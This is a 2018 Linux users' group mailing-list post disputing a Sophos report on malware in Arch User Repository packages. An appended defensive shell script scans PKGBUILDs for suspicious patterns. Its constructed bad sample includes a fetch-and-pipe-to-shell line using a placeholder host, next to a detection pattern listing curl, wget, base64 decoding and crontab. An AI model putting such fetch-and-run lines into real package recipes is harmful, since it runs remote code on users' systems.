[sf-lug] Malware hidden in Linux packages: first Gentoo, more lately Arch.

Rick Moen rick at linuxmafia.com
Wed Jul 11 18:05:53 PDT 2018


Quoting Bobbie Sellers (bliss-sf4ever at dslextreme.com):

>     Well, this is a clever, if nasty, hack.
> 
> <https://nakedsecurity.sophos.com/2018/07/11/another-linux-distro-poisoned-with-malware/>

Never, ever, ever believe self-promotion articles from anti-virus /
security companies without careful cross-checking.

1.  The Arch User Repository is _not_ Arch Linux.  This is like
confusing the contents of http://addons.mozilla.org/ (a public bazaar) 
with a distro-packaged and vetted copy of Firefox.

2.  Halfway down the page, after a good deal of rather mindless
sensationalism, the Sophos author finally acknowledges that point himself:

   To be fair to the Arch team, the hacked packages were found on AUR,
   which is the Arch User Repository, which isn’t vouched for or vetted
   by the Arch maintainers – in the same sort of way that none of the
   off-market Android forums are vouched for by Google.

Quite so.  Moreover, all AUR contents are _specifically disclaimed_ as 
unvetted contents that you choose to trust at your own risk.  It's right
there at the top of the page, in bold type.  https://aur.archlinux.org/

Disappointingly, the Sophos author then tries to walk his
acknowledgement back:

   Nevertheless, the AUR site is logoed up and branded as the 
   _Arch_ User Repository, not merely the User Repository, so a bit less
   attitude from the Arch team wouldn’t hurt.

Hey, Sophos sales flack, Arch Linux's AUR is a carefully labelled
public-bazaar site with zero checking, something that should be familiar
to all computer users not just newly arrived from Mars, including (say)
all persons familiar with http://addons.mozilla.org/ and untold similar
places.  Where do you get off changing the subject to the Arch
developers' 'attitude' at responding to inane complaints?  Maybe it's
because you want to flog Sophos 'anti-virus' products?

  Note. We don’t expect this thing to be a problem in real life, but
  Sophos products will nevertheless detect the abovementioned scripts as
  Linux/BckDr-RVR, and block the C&C URLs used to “feed” the attack. (If
  you’d like to try Sophos Anti-Virus for Linux, by the way, it’s 100%
  free both at work and at home.)

Oh, _right_, yes, of course you do.



> It had been cleaned up by the time I heard about it, but this was on
> distributions used by much more knowledgeable users than myself.

No, it wasn't on a distribution.



Just because you can damage a distribution by adding unwise third-party
contents from nobody-in-particular to it doesn't make that the
distribution's fault.

There is no way to prevent a local Linux administrator armed with root
authority from taking very unwise actions and destroying or damaging
his/her system -- and that is the case with or without 'malware'.  A
reckless system owner using /bin/sh is _even_ more dangerous than a
programmer wielding a screwdriver.

And layering 'anti-virus' software onto such a user's system is not an
improvement, failing as it does to address the actual problem of
reckless admin behaviour.

Installing software made by nobody-in-particular from third-party
unvetted sites like the AUR is reckless admin behaviour.  If you're
willing to take dangerous actions like that, you actually have a lot
bigger headaches than 'malware'.


> The same sort of thing could be done to other distributions so read
> the article if you have not already.

No, it could not be done to 'other distributions', because it wasn't
done to a distribution in this case, in the first place.  But, sure,
read the Sophos self-promotion piece -- skeptically.  _Even_ that
slanted piece eventually gets around to telling the truth.  You just
have to read far enough down the page.


Further examples of how anti-malware / security industry figures tend to
distort, misinform, and dissemble, attempting to bullshit even technical
users into outsourcing thinking and instead just buy their junk (long):
http://linuxmafia.com/faq/Essays/security-snake-oil.html
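
As an added example (not part of Rick's message, and not Arch's own
tooling): a small POSIX sh script doing the minimum review a cautious
admin should give an AUR PKGBUILD before handing it to makepkg, which
executes the recipe with the invoking user's privileges. It flags lines
that fetch and run remote content, decode embedded payloads or touch the
live system instead of staging into "$pkgdir", reports checksums set to
SKIP, and prints the declared source URLs so they can be compared with
the upstream project's real download location. Both PKGBUILDs below are
constructed for illustration and the host example.invalid is a
placeholder.

```sh
#!/bin/sh
# Added example: static review of an AUR PKGBUILD before running makepkg.
# Not from the original post or from the Arch project. The sample recipes
# are constructed for illustration; example.invalid is a placeholder host.

# Patterns that have no business in a package recipe: the recipe itself
# downloading things (makepkg handles source=() for you), piping remote
# content into a shell, decoding embedded payloads, eval, or writing to the
# live system (bare /etc, systemctl, crontab) instead of "$pkgdir".
SUSPICIOUS='curl|wget|\|[[:space:]]*(ba)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|(^|[[:space:]])eval[[:space:]]|(^|[[:space:]])/etc/|systemctl|crontab'

# scan_pkgbuild FILE: print suspicious non-comment lines; return 1 if any.
scan_pkgbuild() {
    hits=$(grep -nE "$SUSPICIOUS" "$1" | grep -vE '^[0-9]+:[[:space:]]*#' || true)
    [ -z "$hits" ] && return 0
    printf 'suspicious lines in %s:\n%s\n' "$1" "$hits"
    return 1
}

# list_sources FILE: print the source=() arrays (single- or multi-line) so
# each URL can be checked against where upstream really publishes releases.
list_sources() {
    awk '/^source[a-z0-9_]*=\(/ { in_src = 1 }
         in_src { print; if ($0 ~ /\)/) in_src = 0 }' "$1"
}

# unverified_sources FILE: return 1 if any checksum array contains SKIP.
# SKIP is normal for VCS sources and detached signatures, but for a tarball
# it means makepkg will build whatever the server happened to send.
unverified_sources() {
    n=$(awk '/^(md5|sha[0-9]+|b2)sums[a-z0-9_]*=\(/ { in_sums = 1 }
             in_sums { if ($0 ~ /SKIP/) skip++; if ($0 ~ /\)/) in_sums = 0 }
             END { print skip + 0 }' "$1")
    [ "$n" -eq 0 ] && return 0
    printf '%s unverified download(s) in %s (checksum SKIP)\n' "$n" "$1"
    return 1
}

# review_pkgbuild FILE: run every check; return 0 only if nothing was flagged.
review_pkgbuild() {
    status=0
    scan_pkgbuild "$1" || status=1
    unverified_sources "$1" || status=1
    printf 'declared sources in %s:\n' "$1"
    list_sources "$1"
    return $status
}

# Constructed sample: a recipe that fetches and runs a remote script during
# package() and tells makepkg not to verify its tarball.
BAD_PKGBUILD=$(mktemp)
cat > "$BAD_PKGBUILD" <<'EOF'
pkgname=demo-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/${pkgname}-${pkgver}.tar.gz")
sha256sums=('SKIP')

package() {
  install -Dm755 "$srcdir/demo" "$pkgdir/usr/bin/demo"
  # "post-install helper"
  curl -s https://example.invalid/setup.sh | sh
}
EOF

# Constructed sample: the same recipe without the extras.
GOOD_PKGBUILD=$(mktemp)
cat > "$GOOD_PKGBUILD" <<'EOF'
pkgname=demo-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/${pkgname}-${pkgver}.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

package() {
  install -Dm755 "$srcdir/demo" "$pkgdir/usr/bin/demo"
}
EOF

review_pkgbuild "$BAD_PKGBUILD" || echo "DO NOT BUILD: $BAD_PKGBUILD"
review_pkgbuild "$GOOD_PKGBUILD" && echo "no findings; now read the whole file anyway"
```

A clean run is not a verdict, only the removal of the obvious patterns:
still read the entire PKGBUILD and any .install file it references, and
diff the recipe against its previous revision on aur.archlinux.org before
building, because a one-line change to an otherwise familiar package is
exactly what a careless "yes, build it" will miss.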



